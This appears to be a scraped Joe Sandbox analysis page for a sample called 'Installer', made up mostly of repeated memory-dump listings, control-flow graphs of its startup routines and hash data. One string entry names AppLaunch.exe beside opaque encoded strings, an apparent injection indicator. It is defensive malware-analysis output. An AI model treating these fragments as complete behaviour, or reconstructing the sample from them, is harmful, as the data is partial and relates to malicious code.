                                                                                                                                                                    • Associated: 00000000.00000002.305181966.000000000019F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001A1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001A3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001A5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001A7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001AB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001AF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001B3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001B5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001B7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001B9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001BB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001E6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001E8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001EE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001F2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001F4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001F6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001F8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001FA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001FC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001FE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.0000000000200000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.0000000000202000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.0000000000204000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.0000000000229000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.306047748.000000000022D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.306067690.0000000000236000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.306080099.0000000000239000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.306494076.00000000002EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.306511138.00000000002EF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.306605590.000000000034E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.306611664.000000000034F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.306631116.0000000000356000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_120000_Installer.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ConsoleFeatureFreePresentProcessormemcpy
                                                                                                                                                                    • String ID: 3ykz7ZN6yU6I9oGA7GS9QnJkBnaha81XGykjYnI9j7AP3i9R2UnwrKCGQiqXCVZ9O$4QgFZqZSgUTltzHJe3lDyY3N217iiBXiVVTwhWhBkVvMRshiXOZZ8l0sfee7JjUv3$B$C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                                                                                                                                                                    • API String ID: 2757344885-1835021991
                                                                                                                                                                    • Opcode ID: cc293efdee61201191644de46472bcd00f438059c9e020bb0cadf186ac2b1e35
                                                                                                                                                                    • Instruction ID: 577d407175f7701c25e1fa38d89e9c91300c7ec78bfc314e406822aeb8f95fa9
                                                                                                                                                                    • Opcode Fuzzy Hash: cc293efdee61201191644de46472bcd00f438059c9e020bb0cadf186ac2b1e35
                                                                                                                                                                    • Instruction Fuzzy Hash: 554148B1D08228DFCB00EFA4E94439EBBF0FF88314F008569E558A7290D7789A98CF51
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 00121299 Relevance: 5.1, APIs: 4, Instructions: 78stringCOMMON
                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    • Executed
                                                                                                                                                                    • Not Executed
                                                                                                                                                                    control_flow_graph 86 121299 87 1212a0-1212a3 86->87 88 1212a5-1212ad 87->88 89 1212af 87->89 88->87 88->89 90 1212b4-1212bc 89->90 91 1212d2-1212f2 malloc 90->91 92 1212be-1212c7 90->92 95 121463 91->95 96 1212f8-121309 91->96 93 1212c9 92->93 94 1212cd 92->94 93->94 94->91 99 12146b-12148a exit 95->99 97 121310-121344 strlen malloc memcpy 96->97 97->97 98 121346-121381 call 121b40 call 12190b 97->98 107 121386-121393 98->107 102 121410-121419 GetStartupInfoA 99->102 103 121180-121191 99->103 108 121421-121436 _cexit 102->108 106 1211a7-1211b3 103->106 109 121193-121195 106->109 110 1211b5-1211bf 106->110 107->99 111 121399-1213a1 107->111 114 121440-12145e _initterm 108->114 112 1213b0-1213bd 109->112 113 12119b-1211a4 Sleep 109->113 115 1213c3-1213d7 _amsg_exit 110->115 116 1211c5-1211cc 110->116 111->108 117 1213a3-1213ae 111->117 112->115 112->116 113->106 118 1211ea-1211ec 115->118 119 1213dd-1213fd _initterm 115->119 116->114 120 1211d2-1211e4 116->120 121 1211f2-1211f9 118->121 122 121403-121409 118->122 119->121 119->122 120->118 120->119 123 121217-121238 call 121eb0 SetUnhandledExceptionFilter call 122a00 121->123 124 1211fb-121214 121->124 122->121 129 12123d-121257 call 121ce0 __p__acmdln 123->129 124->123 132 121271-121277 129->132 133 121259 129->133 134 121260-121262 132->134 135 121279-121284 132->135 133->90 137 121290-121292 134->137 138 121264-121267 134->138 136 12126e 135->136 136->132 137->88 139 121294 137->139 138->137 140 121269 138->140 139->89 140->136
                                                                                                                                                                    APIs
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.304915609.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.304906143.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.304937444.0000000000123000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.304942769.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305120624.0000000000152000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305132062.0000000000155000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305132062.0000000000157000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305132062.000000000015B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305154315.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305160103.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305172976.0000000000162000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.0000000000164000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.000000000019F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001A1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001A3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001A5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001A7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001AB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001AF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001B3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001B5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001B7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001B9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001BB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001E6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001E8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001EE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001F2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001F4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001F6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001F8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001FA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001FC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001FE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.0000000000200000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.0000000000202000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.0000000000204000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.0000000000229000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.306047748.000000000022D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.306067690.0000000000236000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.306080099.0000000000239000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.306494076.00000000002EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.306511138.00000000002EF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.306605590.000000000034E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.306611664.000000000034F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.306631116.0000000000356000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_120000_Installer.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: malloc$memcpystrlen
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3553820921-0
                                                                                                                                                                    • Opcode ID: f35ebda1604d19fa948b4b679bc9e9c4cf03b81c32866911af69b3ce39e570d9
                                                                                                                                                                    • Instruction ID: e76d250dacd25e8c1153515d3e89d0ec29dea9802f02e0153e41d8cff70fbe43
                                                                                                                                                                    • Opcode Fuzzy Hash: f35ebda1604d19fa948b4b679bc9e9c4cf03b81c32866911af69b3ce39e570d9
                                                                                                                                                                    • Instruction Fuzzy Hash: D33178B5A04361EFDB21DF68E88039DBBF1FB58301F14452AE8489B751E334A995CF80
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 00121289 Relevance: 5.1, APIs: 4, Instructions: 75stringCOMMON
                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    • Executed
                                                                                                                                                                    • Not Executed
                                                                                                                                                                    control_flow_graph 141 121289 142 121290-121292 141->142 143 121294 142->143 144 1212a5-1212ad 142->144 145 1212af 143->145 144->145 146 1212a0-1212a3 144->146 147 1212b4-1212bc 145->147 146->144 146->145 148 1212d2-1212f2 malloc 147->148 149 1212be-1212c7 147->149 152 121463 148->152 153 1212f8-121309 148->153 150 1212c9 149->150 151 1212cd 149->151 150->151 151->148 156 12146b-12148a exit 152->156 154 121310-121344 strlen malloc memcpy 153->154 154->154 155 121346-121393 call 121b40 call 12190b 154->155 155->156 168 121399-1213a1 155->168 159 121410-121419 GetStartupInfoA 156->159 160 121180-121191 156->160 165 121421-121436 _cexit 159->165 163 1211a7-1211b3 160->163 166 121193-121195 163->166 167 1211b5-1211bf 163->167 171 121440-12145e _initterm 165->171 169 1213b0-1213bd 166->169 170 12119b-1211a4 Sleep 166->170 172 1213c3-1213d7 _amsg_exit 167->172 173 1211c5-1211cc 167->173 168->165 174 1213a3-1213ae 168->174 169->172 169->173 170->163 175 1211ea-1211ec 172->175 176 1213dd-1213fd _initterm 172->176 173->171 177 1211d2-1211e4 173->177 178 1211f2-1211f9 175->178 179 121403-121409 175->179 176->178 176->179 177->175 177->176 180 121217-121257 call 121eb0 SetUnhandledExceptionFilter call 122a00 call 121ce0 __p__acmdln 178->180 181 1211fb-121214 178->181 179->178 189 121271-121277 180->189 190 121259 180->190 181->180 191 121260-121262 189->191 192 121279-121284 189->192 190->147 191->142 194 121264-121267 191->194 193 12126e 192->193 193->189 194->142 195 121269 194->195 195->193
                                                                                                                                                                    APIs
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.304915609.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.304906143.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.304937444.0000000000123000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.304942769.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305120624.0000000000152000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305132062.0000000000155000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305132062.0000000000157000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305132062.000000000015B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305154315.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305160103.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305172976.0000000000162000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.0000000000164000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.000000000019F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001A1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001A3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001A5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001A7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001AB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001AF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001B3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001B5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001B7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001B9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001BB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001E6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001E8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001EE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001F2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001F4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001F6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001F8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001FA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001FC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001FE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.0000000000200000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.0000000000202000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.0000000000204000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.0000000000229000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.306047748.000000000022D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.306067690.0000000000236000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.306080099.0000000000239000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.306494076.00000000002EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.306511138.00000000002EF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.306605590.000000000034E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.306611664.000000000034F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.306631116.0000000000356000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_120000_Installer.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: malloc$memcpystrlen
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3553820921-0
                                                                                                                                                                    • Opcode ID: 2fad511656d14ae9813add6bb9f7424a0f281d073893acb5d23f1b1ad947f00c
                                                                                                                                                                    • Instruction ID: 745ae4bdbbbb06823b1538a94bc47b53f02920738dba34e84540078e3fe8fee8
                                                                                                                                                                    • Opcode Fuzzy Hash: 2fad511656d14ae9813add6bb9f7424a0f281d073893acb5d23f1b1ad947f00c
                                                                                                                                                                    • Instruction Fuzzy Hash: F43136B5A04361EFCB21DF68E88079DB7F1FB58301F10892AE9489B750E734A995CF81
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Non-executed Functions

                                                                                                                                                                    Function 001214C0 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 43libraryloaderCOMMON
                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    • Executed
                                                                                                                                                                    • Not Executed
                                                                                                                                                                    control_flow_graph 289 1214c0-1214db GetModuleHandleA 290 121550-12155a 289->290 291 1214dd-121519 LoadLibraryA GetProcAddress * 2 289->291 292 12151c-121523 290->292 291->292 293 121536-121549 call 1214a0 292->293 294 121525-12152d 292->294 294->293
                                                                                                                                                                    APIs
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.304915609.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.304906143.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.304937444.0000000000123000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.304942769.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305120624.0000000000152000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305132062.0000000000155000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305132062.0000000000157000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305132062.000000000015B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305154315.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305160103.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305172976.0000000000162000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.0000000000164000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.000000000019F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001A1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001A3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001A5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001A7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001AB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001AF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001B3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001B5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001B7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001B9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001BB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001E6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001E8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001EE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001F2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001F4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001F6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001F8000.00000080.00000001.01000000.00000003.sdmpDownload File
